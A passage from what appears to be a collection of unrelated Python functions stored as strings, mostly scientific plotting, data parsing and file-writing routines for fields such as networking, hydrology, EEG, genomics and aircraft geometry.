color=\"darkorange\")\n\n con_cubic = plt.bar(x + 1 * width - 1.2,\n index_cubic,\n width=width,\n label='Against CUBIC',\n alpha=0.5,\n color=\"lawngreen\")\n\n con_itself = plt.bar(x + 2 * width - 1.2,\n index_itself,\n width=width,\n label='Against Another Same CCA',\n alpha=0.5,\n color=\"dodgerblue\")\n\n # Index\n plt.xticks(x + 1.5 * width - 1.2, [\"BBR\", \"Scalable\", \"BIC\", \"High Speed\",\n \"H-TCP\", \"Hybla\", \"Illinois\", \"Vegas\",\n \"YeAH\"],\n fontsize=fsize,\n rotation=\"45\")\n plt.ylabel(\"Jain`s Fairness Index\", fontsize=fsize)\n plt.yticks(fontsize=fsize)\n plt.ylim(0.5, 1.1)\n\n ax = plt.subplot(111)\n ax.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3,\n ncol=3, mode=\"expand\", borderaxespad=0., fontsize=fsize)\n\n plt.subplots_adjust(left=0.07, right=0.98, top=0.9, bottom=0.2)\n\n plt.show()", "def write_file(self):\r\n # -open file for writing\r\n f_fbob = open(self.fn_path, 'w')\r\n\r\n # -write header\r\n f_fbob.write('%s\\n' % (self.heading))\r\n\r\n # -write sections 1 & 2 : NOTE- what about NOPRINT?\r\n f_fbob.write('%10i%10i%10i%10i\\n' % (self.nqfb, self.nqcfb,\r\n self.nqtfb, self.iufbobsv))\r\n f_fbob.write('%10e\\n' % (self.tomultfb)) # check format\r\n\r\n # -write sections 3-5 looping through observations groups\r\n c = 0\r\n for i in range(self.nqfb):\r\n # while (i < self.nqfb):\r\n # write section 3\r\n f_fbob.write('{:10d}{:10d}\\n'.format(self.nqobfb[i],\r\n self.nqclfb[i]))\r\n\r\n # Loop through observation times for the groups\r\n for j in range(self.nqobfb[i]):\r\n # -write section 4\r\n f_fbob.write(\r\n '{}{:10d}{:10.4g}{}{:10.4g}\\n'.format(self.obsnam[c],\r\n self.irefsp[c],\r\n self.toffset[c], ' ',\r\n self.flwobs[c]))\r\n c += 1 # index variable\r\n\r\n # -write section 5 - NOTE- need to adjust factor for muliple obs same cell\r\n for j in range(abs(self.nqclfb[i])):\r\n if self.nqclfb[\r\n i] < 0: # set factor to 1.0 for all cells in group\r\n self.factor[i, :] = 1.0\r\n f_fbob.write('{:10d}{:10d}{:10d}{}{:10f}\\n'\r\n .format(self.layer[i, j], (self.row[i, j]),\r\n self.column[i, j],\r\n ' ', self.factor[\r\n i, j])) # note- is 10f good enough here?\r\n\r\n f_fbob.close()\r\n #\r\n # swm: BEGIN hack for writing standard file\r\n sfname = self.fn_path # swm:hack\r\n sfname += '_ins' # swm: hack\r\n # write header\r\n f_ins = open(sfname, 'w') # swm: hack for standard file\r\n f_ins.write('jif @\\n') # swm: hack for standard file\r\n f_ins.write('StandardFile 0 1 %s\\n' % (\r\n self.nqtfb)) # swm: hack for standard file\r\n for i in range(0, self.nqtfb):\r\n f_ins.write(\r\n '{}\\n'.format(self.obsnam[i])) # swm: hack for standard file\r\n\r\n f_ins.close()\r\n # swm: END hack for writing standard file\r\n\r\n return", "def append_output(metadata, filename):\n size_pre = os.path.getsize(filename) / 1.0e+6\n metadata.to_csv(filename, header=False,\n mode='a', compression='gzip')\n size_post = os.path.getsize(filename) / 1.0e+6\n size_appended = size_post - size_pre\n\n print(\"Appended {:.2F} MB of metadata to {} ({:.2F} MB)\"\n .format(size_appended, filename, size_post))", "def init_datafile(output_settings, instrument):\r\n # find the current directory\r\n target_dir = '/'.join([output_settings['folder'], output_settings['cruise'], 'Data/Acrobat/RAW',instrument['name']])\r\n print_spacer()\r\n \r\n # make a new file\r\n print 'Creating new file....'\r\n # find the current time and write as string\r\n current_time = time.strftime(\"%Y-%m-%dT%H%MZ\", time.gmtime(time.time()))\r\n # give it a name\r\n filestr = current_time+'_'+output_settings['cruise']+instrument['name']+'RAW.dat' # concatenates strings using \r\n # print target_dir+'/'+filestr\r\n # now set the target \r\n targetstr = '/'.join([target_dir,filestr]) # concatencates strings using join\r\n print targetstr\r\n # open the text file\r\n fs = open(targetstr, 'w')\r\n return fs # return the file id\r", "def write_fenth_out4fp(fname,dH,vol):\n with open(fname,'w') as f:\n cmd = ' '.join(s for s in sys.argv)\n f.write('# Output at {0:s} from,\\n'.format(datetime.now().strftime('%Y-%m-%d %H:%M:%S')))\n f.write('# {0:s}\\n'.format(cmd))\n #...Num of data, weight for the data\n f.write(' {0:6d} {1:7.3f}\\n'.format(2, 1.0))\n f.write(' {0:8.3f} {1:8.3f}\\n'.format(dH,vol))\n return None", "def file_setup(self):\n #output a .edf file if the input is txt\n if self.args.input_format == 'txt':\n signals = []\n headers = []\n \n #read sample frequency from a .xml file\n if self.args.is_test:\n self.sample_rate = 1024\n else:\n xml_file = open(self.args.input_path + self.args.input_name + '.xml', \"r\")\n xml_content = xml_file.read()\n my_ordered_dict = xmltodict.parse(xml_content)\n dict = json.loads(json.dumps(my_ordered_dict))\n self.sample_rate = eval(dict['RECORD_INFO']['Record']['SamplesFreq'])\n \n #define header, needed for .edf file\n# header = {'label':'ch_name', \n# 'dimension': 'uV',\n# 'sample_rate': self.sample_rate,\n# 'physical_max': 5000,\n# \"physical_min\": -5000,\n# 'digital_max': 5000,\n# 'digital_min': -5000,\n# 'transducer': 'None',\n# 'prefilter': 'None'}\n\n# j = 0\n for i in self.files:\n if i[-3:] != 'xml' and i[-4:] != 'xysw':\n raw = np.loadtxt(self.args.input_path + i)\n self.physical_max.append(np.max(raw))\n self.physical_min.append(np.min(raw))\n \n \n signals.append(raw)\n# new_header = header.copy()\n# new_header['label'] = 'ch' + str(j)\n# new_header['physical_max'] = np.max(raw)\n# new_header['physical_min'] = np.min(raw)\n\n# j = j+1\n# headers.append(new_header)\n self.ch_num = self.ch_num+1\n \n #write edf\n with open(self.output_edf_original, 'w') as output:\n flag = pyedflib.highlevel.write_edf_quick(output.name, signals, self.sample_rate, digital=False)\n if flag == False:\n print('unable to save file into .edf')\n exit()\n else:\n print('txt data loaded into edf, edf saved at ./output_edf as: ' + self.output_edf_original)\n self.raw=mne.io.read_raw_edf(self.output_edf_original,preload=True)\n self.ch_names = self.raw.ch_names\n \n #if already a .edf\n elif self.args.input_format == 'bdf':\n self.raw = mne.io.read_raw_bdf(self.args.input_path + self.files[0], preload = True)\n self.ch_num = len(self.raw.ch_names)\n self.ch_names = self.raw.ch_names\n self.sample_rate = self.raw.info['sfreq']\n elif self.args.input_format == 'edf':\n self.raw = mne.io.read_raw_edf(self.args.input_path + self.files[0], preload = True)\n self.ch_num = len(self.raw.ch_names)\n self.ch_names = self.raw.ch_names\n self.sample_rate = self.raw.info['sfreq']\n elif self.args.input_format =='mne':\n mne_exp = mne.datasets.eegbci.load_data(1, 2, path=None, force_update=False, update_path=None, base_url='https://physionet.org/files/eegmmidb/1.0.0/', verbose=None)[0]\n self.raw = mne.io.read_raw_edf(mne_exp, preload = True)\n self.ch_num = len(self.raw.ch_names)\n self.ch_names = self.raw.ch_names\n self.sample_rate = self.raw.info['sfreq']\n \n \n return self.raw", "def write_to_file(qz_values, form_factors, errors, filename):\n with open(filename, 'w') as f:\n f.write(\"\"\"set direct_err 1\nset stepsize_integral 0.05\nset normal_mode 2\n\n\"\"\")\n f.write(\"\"\"# This sample was created by NFIT_to_SDP program.\n# (1) Change all ? to an appropriate sample number. \n# (2) Change sample_name to whatever sample name you want.\n# (3) Change other parameters to actual physical values.\n# (4) Copy the following lines to your smp file.\nsamplist ? sample_name\nparameter ? nobeam \\\\\n1.18 2.3 5 2 10 1 -64 65 0.0 \\\\\nx 0.333 67.0 91.0 0 7.875 0.0 9.0 0.0 \\\\\n\"\"\")\n for qz, F, sig in zip(qz_values, form_factors, errors):\n f.write(\"{0: 8.3f} {1: .4f} {2: 8.3f} \\\\\\n\".format(F, qz, sig))", "def writeStats(inDir, outFname):\n ofh = open(outFname, \"w\")\n ofh.write(\"meta\\tkallistoProcReads\\tkallistoAlnReads\\tkallistoEstFragLen\\n\")\n\n inFnames = glob.glob(join(inDir, \"log\", \"*.log\"))\n print(\"Parsing %d logfiles and writing to %s\" % (len(inFnames), outFname))\n for inFname in inFnames:\n cellId = basename(inFname).split(\".\")[0].split(\"_\")[0]\n # [quant] processed 1,836,518 reads, 636,766 reads pseudoaligned\n # [quant] estimated average fragment length: 251.99\n for line in open(inFname):\n if line.startswith(\"[quant] processed \"):\n words = line.split()\n readCount = words[2].replace(\",\",\"\")\n alignCount = words[4].replace(\",\",\"\")\n if line.startswith(\"[quant] estimated average fragment length:\"):\n fragLen = line.split()[5]\n row = [cellId, readCount, alignCount, fragLen]\n ofh.write(\"\\t\".join(row)+\"\\n\")\n ofh.close()", "def final_output_analysis(samples_dict, dir_results_path):\n with open(path.join(dir_results_path, 'corrupted_processes.txt'), 'w', encoding='utf-8', errors='replace') as c_out:\n with open(path.join(dir_results_path, 'analysis.txt'), 'w', encoding='utf-8', errors='replace') as i_out:\n with open(path.join(dir_results_path, 'syscalls.txt'), 'w', encoding='utf-8', errors='replace') as s_out:\n for uuid in sorted(samples_dict.keys()):\n reduced_sample = samples_dict[uuid]\n\n i_out.write('{} {}\\n'.format(string_utils.filename, uuid))\n s_out.write('{} {}\\n'.format(string_utils.filename, uuid))\n c_out.write('{} {}\\n'.format(string_utils.filename, uuid))\n\n # corrupted processes section\n process_repr = '\\t\\t{:15s}\\t{:10d}\\t{:15s}\\tby:\\t{:15s}\\t{:10d}\\n'\n for process in reduced_sample.corrupted_processes:\n c_out.write(process_repr.format(process[0],\n process[1],\n process[2],\n process[3],\n process[4]))\n\n # instruction count section\n i_out.write(string_utils.out_final + '\\t' + str(reduced_sample.total_instruction) + '\\n')\n i_out.write(string_utils.out_terminating + '\\t' + str(reduced_sample.terminate_all) + '\\t')\n i_out.write(string_utils.out_sleeping + '\\t' + str(reduced_sample.sleep_all) + '\\t')\n i_out.write(string_utils.out_crashing + '\\t' + str(reduced_sample.crash_all) + '\\t')\n i_out.write(string_utils.out_raising_error + '\\t' + str(reduced_sample.error_all) + '\\t')\n i_out.write(string_utils.out_writes_file + '\\t' + str(reduced_sample.write_file) + '\\n')\n\n # system calls count section\n s_out.write(string_utils.syscall_final + '\\t' + str(reduced_sample.total_syscalls) + '\\n')\n\n i_out.write('\\n')\n s_out.write('\\n')\n c_out.write('\\n')", "def generate_val_file(id_test,lines,columns):\n print(\"generate_val_file\")\n val_file_name=id_test+\".val\"\n f = io.open(INPUT_PARSER_RESULTS_DIR+val_file_name, \"w\",newline='\\n')\n inverse_count=0\n for line in range(0,lines):\n for column in range(0,columns):\n inverse_count=inverse_count-1\n print(\"(line,column)=(\"+str(line)+\",\"+str(column)+\")\")\n f.write(\"(\"+str(line)+\",\"+str(column)+\") = \"+str(inverse_count)+\"\\n\")\n f.close()", "def print_bm25_field_length_info(path_doc_length_info_bm25f):\n\n doc_length_info = load_pickle(path_doc_length_info_bm25f)\n \n n_terms_author_total = 0\n n_terms_sections_total = 0\n n_terms_title_total = 0\n n_terms_abstract_total = 0\n for cord_uid in doc_length_info.keys():\n \n info = doc_length_info[cord_uid]\n \n n_terms_author_total += info['author']\n n_terms_sections_total += info['sections']\n n_terms_title_total += info['title']\n n_terms_abstract_total += info['abstract']\n \n n_terms_total = n_terms_author_total + n_terms_sections_total + n_terms_title_total + n_terms_abstract_total\n \n print(len(doc_length_info))\n print(f\"n_terms_author_total = {n_terms_author_total}, average={n_terms_author_total/len(doc_length_info)}\")\n print(f\"n_terms_sections_total= {n_terms_sections_total}, average={n_terms_sections_total/len(doc_length_info)}\")\n print(f\"n_terms_title_total = {n_terms_title_total}, average={n_terms_title_total/len(doc_length_info)}\")\n print(f\"n_terms_abstract_total= {n_terms_abstract_total}, average={n_terms_abstract_total/len(doc_length_info)}\")\n print(f\"n_terms_total = {n_terms_total}, average={n_terms_total/len(doc_length_info)}\")", "def main():\n print \"\\nWelcome to the Bloom lab Reed-Muench calculator.\\n\"\n infile = None\n while not infile:\n infile = raw_input(\"Enter the name of the input file in text format: \").strip()\n if os.path.isfile(infile):\n break\n elif infile in ['Q', 'q']:\n print \"Quitting.\"\n sys.exit()\n else:\n infile = None\n print \"Failed to find the specified input file of %s. Try again to enter a valid file name, or enter Q to quit.\" % infile\n print \"Reading input from the file %s.\" % infile\n (samplenames, sampledata, volume, dilution) = ParseInput(infile)\n print \"Read data for %d samples.\" % len(sampledata)\n titers = {}\n for (sample, data) in sampledata.iteritems():\n titers[sample] = Titer(data, volume, dilution)\n print \"\\nHere are the computed titers in TCID50 per ul:\"\n for sample in samplenames:\n print \"%s: %.3f\" % (sample, titers[sample])\n (base, ext) = os.path.splitext(infile)\n outfile = '%s-titers.txt' % base\n print \"\\nNow we will write these titers to the output file %s.\" % outfile\n if AskOverwrite(outfile):\n f = open(outfile, 'w')\n f.write(\"Here are the computed titers in TCID50 per ul.\\n\")\n for sample in samplenames:\n f.write(\"%s:\\t%.3f\\n\" % (sample, titers[sample]))\n f.close()", "def main():\n if len(sys.argv) < 2:\n print('Usage: experiment_get_histogram <filename>')\n sys.exit(1)\n filename = sys.argv[1]\n\n block_sizes = [\n 128, # 128 B\n 512, # 512 B\n 1 * 2 ** 10, # 1 KiB\n 4 * 2 ** 10, # 4 KiB\n 8 * 2 ** 10, # 8 KiB\n 64 * 2 ** 10, # 64 KiB\n 128 * 2 ** 10, # 128 KiB\n 512 * 2 ** 10, # 512 KiB\n 1 * 2 ** 20, # 1 MiB\n 2 * 2 ** 20, # 2 MiB\n ]\n total_size = 100 * 2 ** 20 # 100 MiB\n\n if os.path.exists('./out'):\n shutil.rmtree('./out')\n os.mkdir('./out')\n csvwriter = csv.DictWriter(\n sys.stdout,\n fieldnames=('block_size', 'milliseconds_elapsed', 'total_size'),\n dialect='unix'\n )\n csvwriter.writeheader()\n for block_size in block_sizes:\n for i in range(50):\n ms_elapsed = get_histogram(\n filename,\n block_size,\n )\n csvwriter.writerow({\n 'block_size': block_size,\n 'milliseconds_elapsed': ms_elapsed,\n 'total_size': total_size,\n })", "def file_creator(title_list):\n for file_name in title_list: #title names are retrieved out of genID.txt\n with open (\"nuc_variant_calls/\"+file_name.strip()+\".var\",'w') as x:\n x.write(\"Feature type\\tAlignment length\\tIdentical nucleotides\\tIndel count\\n\") #Table headers.", "def splitFile(filename, n):\n in_file = open(filename)\n line = in_file.readline()\n count = 0\n while line <> \"\":\n if count < 10: num = \"0\"+str(count)\n else: num = str(count)\n f = open(\"output/\"+filename+\"-\"+num,\"w\")\n for i in range(n):\n if line == \"\": break\n f.write(line)\n line = in_file.readline()\n f.close()\n count += 1\n return count", "def results_to_file(samples, filename, during_analysis):\r\n\r\n results = []\r\n\r\n if hasattr(samples, \"log_evidence\"):\r\n if samples.log_evidence is not None:\r\n\r\n value = \"{:.8f}\".format(samples.log_evidence)\r\n results += [\r\n frm.add_whitespace(str0=\"Bayesian Evidence \", str1=value, whitespace=90)\r\n ]\r\n results += [\"\\n\"]\r\n\r\n value = \"{:.8f}\".format(max(samples.log_likelihoods))\r\n results += [\r\n frm.add_whitespace(str0=\"Maximum Likelihood \", str1=value, whitespace=90)\r\n ]\r\n results += [\"\\n\\n\"]\r\n\r\n results += [\"Maximum Log Likelihood Model:\\n\\n\"]\r\n\r\n formatter = frm.TextFormatter()\r\n\r\n for i, prior_path in enumerate(samples.model.unique_prior_paths):\r\n formatter.add(\r\n (prior_path, format_str().format(samples.max_log_likelihood_vector[i]))\r\n )\r\n results += [formatter.text + \"\\n\"]\r\n\r\n if hasattr(samples, \"pdf_converged\"):\r\n\r\n if samples.pdf_converged:\r\n\r\n results += samples_text.summary(samples=samples, sigma=3.0, indent=4, line_length=90)\r\n results += [\"\\n\"]\r\n results += samples_text.summary(samples=samples, sigma=1.0, indent=4, line_length=90)\r\n\r\n else:\r\n\r\n results += [\r\n \"\\n WARNING: The samples have not converged enough to compute a PDF and model errors. \\n \"\r\n \"The model below over estimates errors. \\n\\n\"\r\n ]\r\n results += samples_text.summary(samples=samples, sigma=1.0, indent=4, line_length=90)\r\n\r\n results += [\"\\n\\ninstances\\n\"]\r\n\r\n formatter = frm.TextFormatter()\r\n\r\n for t in samples.model.path_float_tuples:\r\n formatter.add(t)\r\n\r\n results += [\"\\n\" + formatter.text]\r\n\r\n frm.output_list_of_strings_to_file(file=filename, list_of_strings=results)", "def make(input_filepath, output_filepath) -> None:\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')", "def generate(inputFilename, outputFilename = defaultFileName, \n sizeOfReducedSample = DEFSIZEOFREDUCEDSAMPLE, \n centerEta = DEFCENTERETA, centerPhi = DEFCENTERPHI): \n listOfSignals = convert(inputFilename)\n arrayOfSignals = np.array(listOfSignals)\n arrayOfSignals.shape\n np.save(outputFilename, arrayOfSignals, allow_pickle=False)\n print(\"npy array name: \",outputFilename)", "def process_file(input_file = 'NC_012655.ffn',output_file = 'NC_012655.output'):\n #prepare\n f = open(input_file, 'r')\n o = open(output_file,'w')\n seq = ''\n header = f.readline()\n o.write('GeneID Length GC \\n')\n #work\n for line in f:\n if not line.startswith('>'):\n seq += line\n else:\n o.write(process_gene(header = header, gene = seq))\n header = line\n seq = ''\n #finish\n f.close()\n o.close()\n return 0", "def test_madlib_file_write():\n madlib(input_values)\n file_text = ''\n with open('assets/updated_madlib_text', 'r') as file:\n for line in file:\n file_text += line\n assert file_text == output_text", "def main():\r\n N = 200 # number of samples\r\n port_name = 'COM4' # serial port name\r\n port_speed = 19200 # serial port speed/ baudrate (bits per second)\r\n \r\n t,percent = get_data(N,port_name,port_speed) # get data\r\n file_write(t,percent) # write data to file\r", "def generate_statistics():\n\n with open('final_library.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n next(csv_reader)\n library=[]\n smiles=[]\n for row in csv_reader:\n library.append(row[0])\n smiles.append(row[1])\n #print(library)\n\n #print(smiles)\n\n building_blocks=[]\n for bb in library:\n building_blocks.append(bb.split('-'))\n #print(building_blocks)\n number_of_building_blocks=[]\n for block in building_blocks:\n number_of_building_blocks.append(dict(Counter(block)))\n\n df=pd.DataFrame(number_of_building_blocks,index=smiles)\n df.fillna(0,inplace= True)\n df['Total building blocks'] = df.sum(axis=1, numeric_only=True)\n pd.set_option('display.max_colwidth', -1)\n #print(df)\n df.to_excel(\"statistics.xlsx\")", "def generate_headerfile(template, n_division=10000, df=6, start_chi=25, filepath=\"Chi2PLookup.h\", verbose=False):\n divisor = \"const int Chi2PLookup::divisor = {};\".format(n_division)\n\n names = []\n cutoff = []\n p_values_arrays = []\n degrees_of_freedom = range(1, df+1)\n\n if verbose:\n print(\"Generating p-value arrays...\")\n print(\" df={}\".format(df))\n print(\" precision={}\".format(n_division))\n\n for df in degrees_of_freedom:\n var_name = \"pValues_{}\".format(df)\n names.append(var_name)\n max_chi = max_chi_value(df=df, start_chi=start_chi)\n cutoff.append(max_chi)\n n_elements = max_chi * n_division\n\n chi_values = (val / n_division for val in range(0, n_elements + 1))\n p_values = (str(1 - chi2.cdf(val, df)) for val in chi_values)\n\n if verbose:\n print(\"\\tAdding p-values array to template for degree of freedom = {} ...\".format(df))\n\n p_values_arrays.append(\"double {}[] = {{{}}};\".format(var_name, \", \".join(p_values)))\n\n cutoff_array = \"const int Chi2PLookup::cutoff[] = {{{}}};\".format(\", \".join([str(i) for i in cutoff]))\n p_values_array_of_arrays = \"const double * Chi2PLookup::pValues[] = {{{}}};\\n\".format(\", \".join(names))\n\n template = template.format(divisor, cutoff_array, \"\\n\".join(p_values_arrays), p_values_array_of_arrays)\n\n if verbose:\n print(\"Saving file to: {}\".format(os.path.abspath(filepath)))\n\n with open(filepath, \"w\") as outfile:\n outfile.write(template)\n\n return template", "def produce_output_txt(self):\n\n NAME = \"TODO get name form cpacs object\"\n\n result_dir = get_results_directory(\"WeightConventional\")\n\n output_file = Path(result_dir, \"Aircraft_Geometry.out\")\n\n OutputTextFile = open(output_file, \"w\")\n\n OutputTextFile.write(\"\\n#################################################\")\n OutputTextFile.write(\"\\n###### AIRCRAFT GEOMETRY EVALUATION MODULE ######\")\n OutputTextFile.write(\"\\n###### OUTPUTS ######\")\n OutputTextFile.write(\"\\n#################################################\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nAircraft: \" + NAME)\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nGeometry Evaluations-----------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nUSEFUL INFO -------------------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\n \"\\nIf fuselage or wing number is greater than 1 the\\n\"\n \"information of each obj are listed in an \"\n \"array ordered\\nprogressively\"\n )\n OutputTextFile.write(\n \"\\nSymmetry output: 0 = no symmetry, 1 = x-y,\\n\" + \"2 = x-z, 3 = y-z planes\"\n )\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nRESULTS -----------------------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nFUSELAGE ----------------------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(f\"\\nNumber of fuselage sections [-]: {self.fuse_sec_nb}\")\n OutputTextFile.write(f\"\\nNumber of fuselage segments [-]: {self.fuse_seg_nb}\")\n OutputTextFile.write(f\"\\nCabin segments array [-]: {self.cabin_seg}\")\n OutputTextFile.write(f\"\\nFuse Length [m]: {np.around(self.fuse_length, 5)}\")\n OutputTextFile.write(f\"\\nFuse nose Length [m]: {np.around(self.fuse_nose_length, 5)}\")\n OutputTextFile.write(f\"\\nFuse cabin Length [m]: {np.around(self.fuse_cabin_length, 5)}\")\n OutputTextFile.write(f\"\\nFuse tail Length [m]: {np.around(self.fuse_tail_length, 5)}\")\n OutputTextFile.write(f\"\\nAircraft Length [m]: {np.around(self.tot_length, 5)}\")\n OutputTextFile.write(\n \"\\nCircumference of each section of the fuselage [m]:\"\n f\"\\n{np.around(self.fuse_sec_circ, 5)}\"\n )\n OutputTextFile.write(\n \"\\nRelative distance of each section of the\"\n + \"fuselage, respect to the first one [m]: \\n\"\n + str(np.around(self.fuse_sec_rel_dist, 5))\n )\n OutputTextFile.write(\n \"\\nLength of each segment of the fuselage [m]: \\n\"\n + str(np.around(self.fuse_seg_length, 5))\n )\n OutputTextFile.write(\n \"\\nMean fuselage width [m]: \" + str(np.around(self.fuse_mean_width, 5))\n )\n OutputTextFile.write(\n \"\\nWidth of each section of the fuselage [m]: \\n\"\n + str(np.around(self.fuse_sec_width, 5))\n )\n OutputTextFile.write(\n \"\\nVolume of each segment of the fuselage \"\n \"[m^3]: \\n\" + str(np.around(self.fuse_seg_vol, 5))\n )\n OutputTextFile.write(\n \"\\nVolume of the cabin [m^3]: \" + str(np.around(self.fuse_cabin_vol, 5))\n )\n OutputTextFile.write(\"\\nVolume of the fuselage [m^3]: \" + str(np.around(self.fuse_vol, 5)))\n OutputTextFile.write(\"\\n\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nWINGS -------------------------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(f\"\\nNumber of Wings [-]: {self.wing_nb}\")\n OutputTextFile.write(f\"\\nWing symmetry plane [-]: {self.wing_sym}\")\n OutputTextFile.write(f\"\\nNumber of wing sections [-]: {self.wing_sec_nb}\")\n OutputTextFile.write(f\"\\nNumber of wing segments [-]: {self.wing_seg_nb}\")\n OutputTextFile.write(f\"\\nWing Span [m]: \\n{np.around(self.wing_span, 5)}\")\n OutputTextFile.write(\n \"\\nWing MAC length [m]: \\n\"\n + str(\n np.around(\n self.wing_mac[\n 0,\n ],\n 5,\n )\n )\n )\n OutputTextFile.write(\n \"\\nWing MAC x,y,z coordinate [m]: \\n\"\n + str(\n np.around(\n self.wing_mac[\n 1:4,\n ],\n 5,\n )\n )\n )\n OutputTextFile.write(\n \"\\nWings sections thickness [m]: \\n\" + str(np.around(self.wing_sec_thickness, 5))\n )\n OutputTextFile.write(\n \"\\nWings sections mean thickness [m]: \\n\" + str(np.around(self.wing_sec_mean_thick, 5))\n )\n OutputTextFile.write(\n \"\\nWing segments length [m]: \\n\" + str(np.around(self.wing_seg_length, 5))\n )\n OutputTextFile.write(\n \"\\nWing max chord length [m]: \\n\" + str(np.around(self.wing_max_chord, 5))\n )\n OutputTextFile.write(\n \"\\nWing min chord length [m]: \\n\" + str(np.around(self.wing_min_chord, 5))\n )\n OutputTextFile.write(\n \"\\nWings planform area [m^2]: \\n\" + str(np.around(self.wing_plt_area, 5))\n )\n OutputTextFile.write(\n \"\\nMain wing planform area [m^2]: \" + str(np.around(self.wing_plt_area_main, 5))\n )\n OutputTextFile.write(\"\\nVolume of each wing [m^3]: \\n\" + str(np.around(self.wing_vol, 5)))\n OutputTextFile.write(\"\\nTotal wing volume [m^3]: \" + str(np.around(self.wing_tot_vol, 5)))\n OutputTextFile.write(\"\\nWing volume for fuel storage [m^3]: \" + str(self.wing_fuel_vol))\n\n # Close Text File\n OutputTextFile.close()", "def generate_file_ending(k_out, sphere_radius):\n kout = f'{k_out:.3f}'\n spr_rad = f'{sphere_radius:.3f}'\n\n current_string = \"kout_\" + kout + \"_\" + \"spr_rad_\" + spr_rad\n return current_string", "def write_file_simple(self,filename):\n\n output = open(filename,\"w\")\n # write header\n output.write(\"# %1s %3s %22s %6s %22s\\n\"%(\"l\",\"n\",\"nu_theo (muHz)\",\"unused\",\"Inertia\"))\n for i in range(self.modes.shape[0]):\n output.write(\" %1d %3d %22.15e 0.0 %22.15e\\n\"%( \\\n self.modes[\"l\"][i], \\\n self.modes[\"n\"][i], \\\n self.modes[\"freq\"][i]*self.glb[ifreq_ref], \\\n self.modes[\"inertia\"][i]))\n output.close()", "def makeWeights(_files,treeName,category,_outputFile, BINS, PT, ETA):\n\tROOT.gROOT.SetBatch(1)\n\n\t#treeName = 'histoMuFromTk/fitter_tree'\n\t_trees = dict( [ ( name, _file.Get(treeName) ) for name,_file in _files.iteritems()] )\n\t#Check if in both files are the tree\n\tfor _tree in _trees.itervalues():\n\t\tif not _tree:\n\t\t\treturn None\n\t\n\thistos = {}\n\tweights = {}\n\n\t#-- The ':' token in A:B read as 'B conditioned to A' (look this unregular order)\n\t#-- The categories are datamembers which can be 1 or 0, a condition;\n\t#-- if we want to weight the pt-distribution of all probes for the L1Mu3 trigger\n\t#-- category, we must decided with respect which muonID category (Glb, TMLSAT, ...), then\n\t#-- reduce to a subset which the muonID category == 1 and calculate the weight of the\n\t#-- pt-distribution\n\t#-- The category variable can be A:B:C:..., the last one is the only one which we don't \n\t#-- want to reduce (see find category)\n\tcondCategory = ''\n\tstoreCategory = 'weight'\n\tif category.find(':') != -1:\n\t\t_catList = category.split(':')\n\t\t#-- This for is to include the quality cuts and other possible categories\n\t\tfor i in xrange(len(_catList)-1):\n\t\t\tcondCategory += ' && '+_catList[i]+' == 1 '# BUG------> && '+triggerCat+' == 1' \n\t\t\tstoreCategory += '_'+_catList[i]\n\n\tinstName = lambda k,pt : PT+'>>h_'+category+name+str(k)+'(50,'+str(pt[0])+','+str(pt[1])+')'\n\tcuts = lambda pt,eta: PT+' >= '+str(pt[0])+' && '+PT+' <'+str(pt[1])+\\\n\t\t\t' && '+ETA+' >= '+str(eta[0])+' && '+ETA+' < '+str(eta[1])+condCategory\n\t#print cuts #--------------------------> PROVISONAL: PARECE QUE SE RECUPERAN LOS ESPECTROS DE LOS PASSING\n\t #--------------------------> NO DE LOS ALL\n\tk = 0\n\tfor i in xrange(len(BINS.__getattribute__(PT))-1):\n\t\tpt = (BINS.__getattribute__(PT)[i],BINS.__getattribute__(PT)[i+1])\n\t\tfor j in xrange(len(BINS.__getattribute__(ETA))-1):\n\t\t\teta = (BINS.__getattribute__(ETA)[j],BINS.__getattribute__(ETA)[j+1])\n\t\t\tfor name,_t in _trees.iteritems(): \n\t\t\t\tN = _t.Draw( instName(k,pt),cuts(pt,eta) )\n\t\t\t\thistos[name] = ROOT.gDirectory.Get('h_'+category+name+str(k))\n\t\t\tprint ' \\033[1;34mDoing bin'+str(k)+' '+PT+'=('+str(pt[0])+','+str(pt[1])+') '+ETA+'=('+str(eta[0])+','+str(eta[1])+')\\033[1;m'\n\t\t\tswap = histos['numerator'].Clone(category+'_bin'+str(k))\n\t\t\tdummy = swap.Divide(histos['denominator'])\n\t\t\tweights[category+'_bin'+str(k)] =( (eta[0],eta[1]), (pt[0],pt[1]), ROOT.gDirectory.Get(category+'_bin'+str(k)) )\n\t\t\t#Acura els limits\n\t\t\tweights[category+'_bin'+str(k)][2].GetXaxis().SetLimits( pt[0], pt[1] ) \n\t\t\t#weights[category+'_bin'+str(k)][2].SetNormFactor(1) \n\t\t\tk += 1\n\t_out = ROOT.TFile(_outputFile,'RECREATE')\n\tfor name,(etaBins,ptBins,histo) in weights.iteritems():\n\t\thisto.Write()\n\t_out.Close()\t\n\treturn weights", "def countDataSize(self,filename):\n \n try:\n d = h5py.File(filename,'r')\n except:\n print(filename)\n return \n\n N = 0\n scan_edges = d['level2/Statistics/scan_edges'][:]\n for (start,end) in scan_edges:\n N += (end-start)//self.offsetLen * self.offsetLen\n d.close()\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def write_lengths(gene_data, exon_data, out_file):\n ofunc = get_open_function(out_file)\n with ofunc(out_file, 'wt') as o:\n o.write('gene_id\\tgene_type\\taggregate_length\\n')\n for gene in sorted(exon_data):\n gtype = gene_data[gene]\n data = []\n for exon in 